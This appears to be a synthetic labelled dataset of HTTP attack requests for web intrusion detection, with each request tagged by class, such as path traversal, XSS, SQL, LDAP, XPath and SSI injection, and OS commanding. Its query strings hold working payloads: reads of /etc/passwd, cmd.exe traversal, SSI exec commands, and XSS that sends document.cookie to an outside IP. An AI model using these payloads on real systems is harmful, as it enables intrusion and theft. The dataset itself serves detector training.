If-Unmodified-Since: Sat, 15 Mar 08 17:12:21 GMT
If-Match: *
If-None-Match: "ebLbqXkltxrqeBusg"
If-Range: *
Max-Forwards: 771
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: odibel 3arthngL=ngnhea
Authorization: kknwh 9eoe8nl=fNaroe
Referer: /mt3eat.jsp
TE: gzip;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 3.9; qn-rm; rv:2.5.5) Gecko/52608420
UA-CPU: 68000
UA-Disp: 152,2965,32
Via: 4.3 49.56.205.63, FTP/3.5 www.oniwp.tiff
Transfer-Encoding: compress
Upgrade: is65/4.0, tshy/4.7
Warning: 817 www.zwnsrtsn.css "3ewnh0esrxhhAt6odael" "Wed, 28 Feb 07 06:00:38 GMT"
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 067866355817969470
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41130
Start - Id: 46099
class: PathTransversal
PUT /pgEesq/am20YHcQk_J51N0/UmFIe8/kSckijpA/enT/1hrgxnp5nnav6htle/e.R5svkjmSJAhXgjN3.swf? HTTP/1.1
Content-Length: 76
Content-Language: asevbh
Content-Encoding: gzip
Content-Location: /tI0rrtoa/tltsevoo/oc5n/wohr9f5Z.aspx
Content-MD5: M3R1bjhsc3J4cHJzaGRDbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Jan 07 12:55:46 CET
Last-Modified: Wed, 19 Mar 08 13:26:42 UTC
Host: www.tEm5rsttuo.gov
Connection: Uet0rrtg
Accept: application/*;q=0.2
Accept-Charset: macintosh;q=0.6
Accept-Encoding: *
Accept-Language: ictl0npe-noej7p;q=0.4, aenrthO-tTitm5;q=0.1
Cache-Control: max-stale
Client-ip: 245.20.88.13
Cookie: ef=44;raoorsjuiesyEin=tUdol Eooorm;oobrroe82oeeth8=ysb|;Stmp4_grDYFV=aetRc8feshi;w.nL=t
Cookie2: $Version="0"
Date: Sun, 29 Feb 04 03:55:38 CET
ETag: W/"Lp6NyFktXxgyhfAqmG0"
Expect: 1riwi
If-Modified-Since: Thu, 25 May 06 13:19:06 CET
If-Unmodified-Since: Fri, 23 Oct 09 10:00:17 CET
If-Match: "S2LD5KUML2M384N@i"
If-None-Match: "te@y2_BZ2@wqypf"
If-Range: Mon, 28 Mar 05 13:21:03 UTC
Max-Forwards: 495
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: rtuN esiid=lctr
Authorization: NTLM YXBzZWlhN29nMmVzbWZyaVRvaWxtZUFob3l0SW5zckNuTVRvNnhFc3R0
Range: 43-
Referer: http://eaoc.de/torenh/jlsn/tYesoa/yn4jgn0/msei.php
TE: gzip;q=0.4
Trailer: Trailer
User-Agent: Mozilla/7.2 (X11; U; Solaris 1.3; jr-mS; rv:0.8.9) Gecko/61350616
UA-CPU: x86
UA-Disp: 013,8329,8
UA-Color: color32
UA-Pixels: 1090x096
Via: FTP/7.0 www.ag4QOTl.png, 5.5 185.111.24.26, eennh/5.7 185.15.65.49
Transfer-Encoding: gzip
Upgrade: vecj/8.8, yebd/9.0, jn0/6.9, OasdIr/4.2
Warning: 952 www.hhNewo.css "1l2t" "Sun, 16 Oct 05 14:27:34 CET"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

u1xtermQe@Otmp6yIJ=../../../../../../../../../etc/passwd

End - Id: 46099
Start - Id: 45055
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: www.wths9.it:80
Connection: close
Accept: */*
Accept-Charset: koi8-r, iso-8859-1, utf-8, koi8;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 4.109.212.12
Cookie: YmailPR5o1.wHIe=aD4ys%ieroptZ$e\ozms;mzre=38150;hi3bRn=42952258;elrw0jwtrohE=hzpKys
Cookie2: $Version="8"
Date: Sat, 03 Sep 05 14:13:56 CET
ETag: W/"WKqnGI4_ReyBsPB"
Expect: 100-continue
From: Otai@40ezesm.uk
If-Modified-Since: Wed, 13 Oct 04 05:52:18 UTC
If-Unmodified-Since: Thu, 27 May 04 23:47:01 GMT
If-Match: "eaPu.RcjQ70Jm.@hp"
If-None-Match: "GoqdBXduDrkbwhfn6"
If-Range: "LpRSoyCyuGveBS7fJvx-"
Max-Forwards: 67
Pragma: no-cache
Authorization: Basic aTluZTp0NjJ3cw==
Range: 09453-71450,00-30
Referer: /nkje/oCohro.php4
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: Mozilla/9.1 (compatible; MSIE 8.7; Open BSD i586; deataaO1)
UA-CPU: MIPS
UA-Disp: 7777,3718,16
UA-OS: Windows 95
UA-Pixels: 127x929
Via: 8.1 www.sb7Lwe.jpeg
Transfer-Encoding: deflate
Upgrade: sE8t/1.6, Nhe/7.5, xdp/3.6, iiAp/5.2, r0rr/5.2
Warning: 055 85.8.178.117 "rMtdnroe0tr7el" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 23020199164875
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45055
Start - Id: 47359
class: XSS
GET /d2otjucels0/VCcd/onreS9gdheax/pphpiframeL.ANselectY.html?copyonlikeF=%3Cdiv++onmouseover++++%3D++++%22+%5Bwindow.open%28%27http%3A%2F%2F138.36.81.129%2Fnerone.cfm%27%2Bdocument.cookie%29%3B%5D+%22+++%3E HTTP/1.1
Host: www.m9ssa0sesw.st
Connection: keep-alive
Accept: image/*
Accept-Charset: iso-2022-jp;q=0.6
Accept-Encoding: 
Accept-Language: 8ss-hidtui;q=0.0
Cache-Control: aedl='msdo2p4a'
Client-ip: 30.118.108.110
Cookie: t2tb4O=tfss
Cookie2: $Version="10"
Date: Tue, 12 Apr 05 18:41:02 UTC
ETag: W/"PjYKmUAHLLYd8gcE5"
Expect: rnyes=dheroAo;tunizx
From: 1vfrn@reeDe.org
If-Modified-Since: Mon, 04 May 09 09:01:51 GMT
If-Unmodified-Since: Sun, 05 Jul 09 12:41:16 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Mar 06 22:02:17 UTC
Max-Forwards: 735
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM ZW5sZ3NydDNhZWtuOWxtZmFhUm5pVHJvZXNlZW9hc2FsZGlkbmRuZWh6bmU=
Authorization: NTLM YmE3bXJlc21lbGVsaVJlOWpvZWMxdG80c2VtbWVydDFpaXV6bGg4b25mZWZhZHk=
Range: -066761,152-
Referer: /swcfmctl.php4
TE: gzip
Trailer: Trailer
User-Agent: 5asmccaiys
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 605x5902
Via: rcrn/3.4 www.iTau.css
Transfer-Encoding: compress
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 970 233.253.83.48 "nctm" "Thu, 06 Nov 08 08:21:23 GMT"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47359
Start - Id: 48820
class: XPathInjection
GET /liXyxXqv_FlQciZjF/aooWtcjs/t1WqrNr/d9_7WhwvEgMI/oJqbJk/ss9mor4i/wZVVhpsaZLb93xV/eontvbntme/enew5uavnhcs.tiff?tcit=007&oathaiee=+noe&tqqtjanmeu=N%2FHhn4r%2FDodA%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D0%5D+or+%27nirrber%27++%3D+%27&JBhy-XZRxmSI=6&e7srliaBeLaau3=rTKmtQyjANS HTTP/1.0
Host: www.eeit6b.biz:80
Connection: close
Accept: image/*
Accept-Charset: us-ascii;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 166.142.219.107
Cookie: ejimrmsrrtpa5ee=izH;ayiuqxt=4rd;oJU7t=533369;awbt=qhbP.vx.lg;NP0Hhscripto6U=wvllsrlix
Cookie2: $Version="5"
Date: Wed, 18 Jan 06 15:30:23 GMT
ETag: W/"HxRplA_cWdZdDiPv"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Tue, 19 Jan 10 16:37:14 UTC
If-Unmodified-Since: Sat, 03 Jan 09 04:44:01 CET
If-Match: "u8D4cxaE9W2nrt0eDye"
If-None-Match: *
If-Range: *
Max-Forwards: 0765
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: tCjw ehrbwm=shqlhtz
Authorization: Digest nonce
Range: 5920-3
Referer: http://jaimhh.cz/uttt/tpAuh/enEt8g/4eti.gz
TE: chunked;q=0.6,gzip,chunked
Trailer: If-Match
User-Agent: Mozilla/6.7 (X11; U; Open BSD i386 3.1; bt-rh; rv:6.8.3) Gecko/49120323
UA-CPU: MIPS
UA-Disp: 8370,749,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: FTP/9.5 84.230.141.51
Transfer-Encoding: compress
Upgrade: DgPrai/4.4
Warning: 902 221.77.27.240 "H6v5cts" 
X-Forwarded-For: 30.210.172.155
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 48820
Start - Id: 43773
class: OsCommanding
GET /cgi-local/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: www.ieealtDoli.com:80
Connection: keep-alive
Accept: video/mpeg;q=0.6
Accept-Charset: iso-2022-kr, cp-936;q=0.1
Accept-Encoding: 
Accept-Language: iamgsx-qywn, tir-ldtdOlt;q=0.6, heoa-oacusU, ieaseehe-6e5pmirl;q=0.8, 6n-eo
Cache-Control: max-stale=8584
Client-ip: 111.17.94.212
Cookie: teJTos=yauhhtonoeatrcpar;0eanfeqeIedna4=213517;9uoo=01069;ten=ni5LimTereed617sek
Cookie2: $Version="143"
Date: Tue, 17 Jun 08 15:46:41 GMT
ETag: "jz@gJWZ7STu9UBH8J@"
Expect: ttM2ahme
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Wed, 23 Nov 05 13:12:05 GMT
If-Unmodified-Since: Mon, 21 Sep 09 02:21:32 GMT
If-Match: "TA5Ul3_kyVRwbqsEZBPT"
If-None-Match: "K60_PkDrhfFiNze"
If-Range: *
Max-Forwards: 4
MIME-Version: 7.5
Pragma: reet=aek
Proxy-Authorization: Digest opaque="leSssie"
Authorization: uere agvIeAy=elieh2e
Range: 10571-03
Referer: http://sOeq7tu.com/NetetB/svaog5.png
TE: trailers,trailers,trailers
Trailer: From
User-Agent: qcth (aP-91@tqz; qZL92vcCu; 3PqXKBCn; nGjItoM)
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 834x118
Via: 9.1 www.edbtsoN.jpg
Transfer-Encoding: iovfod; oustwbe=qNORAam
Upgrade: o9h5r/6.8, 6Ah/8.0, nazl/9.6, 2Odwz/0.1, cfaEl/6.1
Warning: 658 www.Hscsmktn.js:3 "stszn923barrtxs" "Thu, 16 Oct 08 07:29:39 UTC"
X-Forwarded-For: 85.158.30.227
X-Serial-Number: 026026261334603
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43773
Start - Id: 42099
class: SqlInjection
GET /earsz1uh/aD7ZSNB_NMzz5L67/azqKS.qxCkfxmpuuDM6O/mRar/rl3zrWDV72/7bseitjs4n/e4snefAdoesoyerf/tquhJ.aspx?eEytacIseQl3=%25utmph+E&i.P.StelnetOh=script%40%24rqt+rr&tiaozal=rts1hpisc&tgoom=83760&f97ei=562&dndotrchDiiu6=wueoyawe2ticssgctc&eCsNeEe9rexg=%27++++%29++UNION+++ALL+SELECT+++685+++++FROM+++sR9urIa+WHERE+++++%28+%27%27+%3D%27 HTTP/1.0
Host: 117.34.212.6:02574
Connection: htiisu
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: compress;q=0.3, compress, compress;q=0.0
Accept-Language: vhrk-mseieu;q=0.0, h-eoikbsu;q=0.2
Cache-Control: max-stale
Client-ip: 195.244.99.47
Cookie: 6h=3fJpB@0TZj;ic4j=u;1eIloews9h7eW=0567353;eR8to=sock_stream
Cookie2: $Version="787"
Date: Wed, 07 Jun 06 16:24:12 UTC
ETag: W/"D83eFbifPOT4iL7"
Expect: troiSdth=erstetro;ir9otau
From: LzmxnseS@evezd.fr
If-Modified-Since: Thu, 09 Nov 06 21:49:12 UTC
If-Unmodified-Since: Fri, 02 Nov 07 22:48:49 CET
If-Match: "DzdzsRX5efM3eheoOl"
If-None-Match: "ou0YwSWz9LPv0Awbi"
If-Range: Sun, 25 Oct 09 10:38:31 UTC
Max-Forwards: 58
MIME-Version: 0.9
Pragma: dlm6accr='oxnauah'
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: Digest opaque="rot0ett"
Range: -824,-58,-460
Referer: http://t7tRqu.it/euuele/aNNodI/p1itoyai/iMtru/eltn.wmn
TE: trailers,trailers
Trailer: User-Agent
User-Agent: lcpoearfra
UA-CPU: Sparc
UA-Disp: 7402,9004,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4728x9077
Via: 7.8 www.vTaaD.css, eeaas/1.3 www.edhn.html, ese/9.2 www.uemleumi.html
Transfer-Encoding: ewnitt; TetiX=2O0pulh
Upgrade: axh/8.9, sit/8.6, rcc/1.0, ite/1.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42099
Start - Id: 40544
class: SSI
GET /aQU@B_/N-3OWYfz@1MPBF/connectGivbscript/SNt1jMlJ4H/nsi7IsSne/QrmkXkzWif/2orAw7DwdU/Znfn8/8e4XrEuLBJp/cetbtskfdtr.png?5h5ami=0892&.s122FBG=eam0ni0ideTs&steslsRqhHO=%3C%21--++++%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&rd6im=sdu7eh5s&eessZgIydwr=eanbteecutec HTTP/1.0
Host: www.to3aid.st
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.2, gzip, identity;q=0.6, deflate;q=0.0
Accept-Language: bt-yduN;q=0.4, iPOiw-rt3mhEj;q=0.5, phgon-q8da, rriaar-e69h, qwahju6E-p5esehe;q=0.5
Cache-Control: oaepeetO='sema'
Client-ip: 131.145.233.117
Cookie: eepmo=sSef;otltu=Cwatdrs554Ed7;en40hOooye=945;Enie=3268991;n2ae1oaow8=\o[e0;aNsurnt9awyn=ooowp-p8
Cookie2: $Version="85"
Date: Fri, 23 Nov 07 04:45:45 CET
ETag: W/"D8T7@zVFaVB37s."
Expect: oaeeclp
From: ta3nehq@tidsguy.fr
If-Modified-Since: Mon, 13 Sep 04 10:37:27 GMT
If-Unmodified-Since: Thu, 06 Aug 09 18:58:47 UTC
If-Match: "m6TxV-BL8hwZuFfeF4"
If-None-Match: "MwoAPGe8uweEN@CNfP"
If-Range: Wed, 09 Feb 05 06:51:08 GMT
Max-Forwards: 06
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: eyuU tZee=sndi
Authorization: Basic b3FMMmVhbjp0Y2E3ZWVsbQ==
Range: 114597-,-333
Referer: /mathgT/hobb/yeroeo.exe
TE: trailers,chunked
Trailer: If-Modified-Since
User-Agent: sBbLHg http://www.onggt.net
UA-CPU: MIPS
UA-Disp: 5247,6150,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 3418x3633
Via: ab8/9.2 www.bu02meCp.gif, 2.6 173.68.80.124, sn8d/8.9 137.236.169.236:6845
Transfer-Encoding: gzip
Upgrade: enoi6/9.0, nmeG/6.4, qlt/3.9
Warning: 564 www.dt5nmh.gif "yhcyTbTnls0" 
X-Forwarded-For: 63.255.2.132
X-Serial-Number: 1920069648333861
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40544
Start - Id: 36307
class: PathTransversal
GET /hcaspea570moewtele8/passwd.n@4B/QZNstdin-O4wC8ZQSi.tiff?CSB2ei.4systemTw=bide0areea&kori=010947932&q5soegrwjeets=a7mrtmexpg8tsm&eoonihe=58445&hA3EbG3tM77M=r%3A%2F.htaccess%7E HTTP/1.1
Host: www.rsce9bder.ch
Connection: close
Accept: */*
Accept-Charset: euc-kr, x-mac-turkish
Accept-Encoding: compress;q=0.8, compress
Accept-Language: rhn-tyslvxto;q=0.2, ospe9ojf-Ngdla1v;q=0.7
Cache-Control: max-stale
Client-ip: 145.8.91.154
Cookie: n8oiol4ua=3de-q2tTMq2;soyns0=nteOftpsdbrzti)it
Cookie2: $Version="25"
Date: Sat, 29 Jan 05 06:40:30 UTC
ETag: "PR@C.gH8sSbya5og"
Expect: 100-continue
From: 5ygo@eiccrasaq.org
If-Modified-Since: Wed, 06 Oct 04 03:00:39 UTC
If-Unmodified-Since: Fri, 11 Aug 06 24:45:50 CET
If-Match: "hyQcQJFAqasYIg81"
If-None-Match: *
If-Range: Sun, 05 Mar 06 06:40:29 CET
Max-Forwards: 3905
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic dWRVMWF0QWg6bnlwc3Q0ag==
Authorization: Basic bXMxZXJobzpzYXVyaWg=
Range: -24492,6727-90720
Referer: /eota/eeetr/boict/eB3tnor.gif
TE: chunked,deflate;q=0.4
Trailer: Cache-Control
User-Agent: Mozilla/9.9 (Windows; U; Win98 2.8; rt-ov; rv:4.3.9) Gecko/09865216
UA-CPU: MIPS
UA-Disp: 505,9391,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: 1.6 www.erott.gif
Transfer-Encoding: gzip
Upgrade: oafi/4.5
Warning: 925 www.seESe.gif "aoh3bha8hrc" 
X-Forwarded-For: 87.172.119.89
X-Serial-Number: 10989646571343616
----: --------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36307
Start - Id: 47926
class: XSS
GET /wB34tty9ToARBqrr/objectacceptkOTshutdownJAQT@/xa9sntph/d3BYEgh-pTaB_Vr-Gl/CwbgsoundrTcUIvLwR/Tnqee2p1aHiokawje530/C2Jgdz7LI/i3@VYguHVRNNc/ettoliO.png?igniSa6lhz=n&afo=%3Cxml+++++id++++%3D%22++++X+%22+%3E%3Ca+%3E%3Cb%3E%26lt%3Bscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F156.0.125.25%2Fnt.mdb%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript%3E%3B%3C%2Fb+%3E%3C%2Fa++%3E%3C%2Fxml++++%3E&nSarhicEayheo=nh0m&NfechoIconnectbgsound=tm_6qvRcD&vk9ad0Z=8608&o8nl=stiaeAagr&ItK8ULXm=ihs2g5lcaFao8t4eh&fuG_i_g=jpp HTTP/1.1
Host: www.yxayi.biz:3
Connection: close
Accept: audio/*;q=0.8
Accept-Charset: euc-kr
Accept-Encoding: 
Accept-Language: ztOajeua-nvas
Cache-Control: thhss='kdoA'
Client-ip: 123.204.156.42
Cookie: ehrneiekgy=hgiise;IULVDFwZN5V=99872;Mqti=56;nctmpBZzs7winntwhere=25889;includeCMcopyZinsertPm_ET=7rnoNmr7;aexb92ebkeI=61372
Cookie2: $Version="61"
Date: Tue, 13 Mar 07 10:46:10 UTC
ETag: W/"zaALvGTogQK3DnCL5"
Expect: on3be5=iadbe;seabhe=eetaKcek
From: T5cc@hrqtf.uk
If-Modified-Since: Fri, 21 Nov 08 07:20:30 CET
If-Unmodified-Since: Mon, 11 Jun 07 09:54:16 GMT
If-Match: "T788q.df5_DcV@5k"
If-None-Match: "T9g_wsGtHyAHRhRw@z"
If-Range: Tue, 07 Aug 07 01:36:24 UTC
Max-Forwards: 4800
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: xm5Eoo cesOKwc=keom4
Authorization: Basic c250RGlZaTozZXl1TWxs
Range: -6
Referer: /siryi/aaa0.cgi
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: epta9wyoa/8.7.9.2.4
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 229x467
Via: 9.9 217.215.191.236:77772, 21dee/5.3 www.mhaqwte.jpeg
Transfer-Encoding: identity
Upgrade: fxd/6.1, eet/0.1, fuo/9.7, elrnan/6.1, mmna/4.6
Warning: 832 www.gaeRu.html "xsaazKzls" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 03181480810
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47926
Start - Id: 36178
class: PathTransversal
GET /smbeclE7aelo/fU4LAJ_bpsQC/vdbjwiTd7sa03rj/UR3yhttps_g5qUmL3union/iZU/o4dtu5phmiQ/oqftaeioo.html?3ottbCaef=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&AwvYvJHV=h7eetofdeyiOen9 HTTP/1.1
Host: www.eMuom6p.it
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.5, gzip, deflate;q=0.6
Accept-Language: *
Cache-Control: min-fresh=8058
Client-ip: 164.124.198.233
Cookie2: $Version="19"
Date: Wed, 20 Dec 06 24:21:34 UTC
If-Match: "-M4HgsDwz.LEKgF"
If-Range: "YgyLXsY3Rx4H6Fr@x"
MIME-Version: 4.5
Pragma: no-cache
Authorization: anat tsothod=texeira6
Referer: /egknM6zi/ognlshW/ieri/tTwD5J.aspx
TE: trailers
Trailer: Authorization
User-Agent: snRhosynitwnaeef
Via: tt9he/7.2 25.200.187.170, HTTP/9.7 13.73.226.230:5436
Transfer-Encoding: deflate
Upgrade: yio/9.6, huzje/3.6, uaeeO/6.2
X-Forwarded-For: 143.21.25.63
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36178
Start - Id: 44413
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 28.127.135.42:1
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-japanese;q=0.3, iso-2022-jp;q=0.2
Accept-Encoding: 
Accept-Language: tdb-f8y8a;q=0.9, dUtmfi-a;q=0.3
Cache-Control: bta9m=nx
Client-ip: 139.10.43.8
Cookie: ssbmna=5
Cookie2: $Version="45"
Date: Mon, 03 Sep 07 05:43:07 UTC
ETag: W/"V.NIwSOWHFxujXg-iF_9"
Expect: qeSl8a=erci;preie
From: on76@weg6se.uk
If-Modified-Since: Mon, 05 Jun 06 02:15:41 UTC
If-Unmodified-Since: Sat, 27 May 06 04:28:22 CET
If-Match: "2uzo5FNbXbBlmlGRD"
If-None-Match: *
If-Range: Sat, 26 Mar 05 19:05:28 UTC
Max-Forwards: 60
MIME-Version: 6.2
Pragma: Rbrb7ct=Aomle7
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: Basic dHNldjo1YW1tb24=
Range: 6-02287,72753-
Referer: /smra4ti/e3i7u/ujsln.jsp
TE: gzip
Trailer: Warning
User-Agent: Mozilla/8.0 (compatible; MSIE 8.2; Open BSD i586; cEec; hdaohh; oeeehlElb)
UA-CPU: Sparc
UA-Disp: 321,8339,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6396x837
Via: ljf/1.1 85.131.140.65, HTTP/6.1 www.8oro.gif
Transfer-Encoding: compress
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 80.244.159.109
X-Serial-Number: 16197588346334119700
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44413
Start - Id: 37554
class: LdapInjection
PUT /aW459H_cl_x6FGx-TyxH/n8o6tei/mE7Eus16tco2e/jAE3nrh3.mdb? HTTP/1.1
Content-Length: 154
Content-Language: gchehb0,btnl3i
Content-Encoding: gzip
Content-Location: http://drggs.uk/swntsa4/i1aAzoi/eManega/afb1.jsp
Content-MD5: YWVsYmFlTWluMXJndHJkcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 May 04 04:09:46 CET
Last-Modified: Tue, 12 May 09 17:18:04 CET
Host: www.shzf.net
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: r-a9meHu, d9n-roqda
Cache-Control: min-fresh=4253
Client-ip: 115.143.65.85
Cookie: sOomnmz4s=tihr7ue;4iurcleomtdsh5E=QaeonullkfJt];lsDy=174655;We.WWphpcuj5X-=203
Cookie2: $Version="00"
Date: Tue, 15 Jan 08 21:45:22 UTC
ETag: "DKMeyFEGPC-DDbSpr"
Expect: ontekast
From: oenu@5hnawusete.de
If-Modified-Since: Fri, 03 Oct 08 21:29:41 CET
If-Unmodified-Since: Tue, 09 Nov 04 03:04:38 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "Pv2KR24IHt-y4M_"
If-Range: *
Max-Forwards: 38
MIME-Version: 7.0
Pragma: oaX=ru8mlz5g
Proxy-Authorization: NTLM dWlobm9qY0FpVXJqd251dGVkZXRzZG5vMTVlbGFjcmVuZWFnZWRlaW1lZnRy
Authorization: Basic Y2pnTjpzZWFTdw==
Range: -78728,9752-,0169-21
Referer: /22eusyr/xheoeOI/depsg/teHnAb.txt
TE: deflate
Trailer: If-None-Match
User-Agent: i4xfl5rme (l-Sh19; 3cd6gu; iZXzlU7bLL)
UA-CPU: MIPS
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1680x065
Via: 1.8 www.onghl.css, HTTP/1.2 166.43.121.185:7212, ecow/7.3 217.120.123.13
Transfer-Encoding: tireo
Upgrade: Uzteet/0.5, dhot7e/3.9, dtjlO/6.3, Whr/7.3, r5he/4.5
Warning: 384 59.186.228.229 "atuGyeetiitsHF" 
X-Serial-Number: 01594707388200191754
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gtbsR8msanchttu=90576&2wshapS952naev=447)(&(objectClass=qntt)(|(sn= i4h5)(cn=eow     J*))&EuexmnA8e9=l6fzv&E_CgVmw4DoU=63538

End - Id: 37554
Start - Id: 40271
class: SSI
GET /o_k1lq4delbtvj.g/tmrqof/euP.ZQ8Ibfnnpi6J/ewceIsu/f8D2C2H4h/iFRqAeX/hAB5C_Z.cgi?_Rxupdatephome3L=odIJ0a.X9gHt&hRmstt=l50i6ob%27eqee&obhiiMoe=74463&n24Ehwzu=rfr%27e&ss=yIpaAAwgjm&efnesR=%3C%21--++++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5CJh%5C2sanrzhty%5Csds9e.exe++++d%3A%5CtovvUs%5Cwww.sior.org%5CM08h%5Cdatabase.mdb+++++%2Fx++exporttofoxpro%22--%3E&t7SgnnVxd5H=4ot HTTP/1.1
Host: 53.83.99.190:80
Connection: close
Accept: audio/basic, audio/basic;q=0.8, application/rtf
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: ftm-3;q=0.0, zj0zet-e, eek0-et;q=0.7, 4eHola8d-evya
Cache-Control: only-if-cached
Client-ip: 52.223.207.82
Cookie: uihp=%;ele0onAsa1alsu=eIuE~window.openod tto3execowanxaccept;AwcsAivoalte=4115574183;pdvaLetooseza=opmntshtpinOae
Cookie2: $Version="29"
Date: Fri, 02 Jul 04 24:15:29 CET
ETag: W/"PvC@pDiEamK-qycb0"
Expect: 100-continue
From: sinl@n3biht.ch
If-Modified-Since: Thu, 15 May 08 17:23:14 UTC
If-Unmodified-Since: Sun, 30 Sep 07 08:43:33 UTC
If-Match: *
If-None-Match: "al9Ci8aqrUkjFeBH"
If-Range: Fri, 24 Aug 07 20:38:47 UTC
Max-Forwards: 58
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM Y1RuZWlyYmludGxvb2NhRXpldHNJZ25zYWRNaFdlZUJvZDI=
Authorization: NTLM Y3NlZXNuaXhsaG9pbnJUMnJtYXNkZGVoZm95RUVlQXlpZWFsbXloaDVzZWVkcGE=
Range: 1030-
Referer: /ioos8atr/sTnecr/e1mIih/serioc.wav
TE: deflate,deflate;q=0.0,deflate
Trailer: Authorization
User-Agent: 6trnichisekr
UA-CPU: MIPS
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6936x3425
Via: 9.8 15.207.231.76
Transfer-Encoding: identity
Upgrade: shUaoo/4.0, eat/0.9, y0aio/2.5, enluo/1.0, siaeN/8.6
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40271
Start - Id: 41797
class: SqlInjection
GET /rnqUMJwjsDySkkF/ao/Ktsszns/eqAip9Z/l9.shtml?tuiftol=%27+%2B+++++%28+++SELECT++TOP+++++1+++I6n++++FROM+nalc%29+++++%2B++%27 HTTP/1.1
Host: www.erhYfaa.uk
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.3
Accept-Language: asnoAiQ-yj, 9nh1R-kiu, l-E4atntt
Cache-Control: max-age=25771
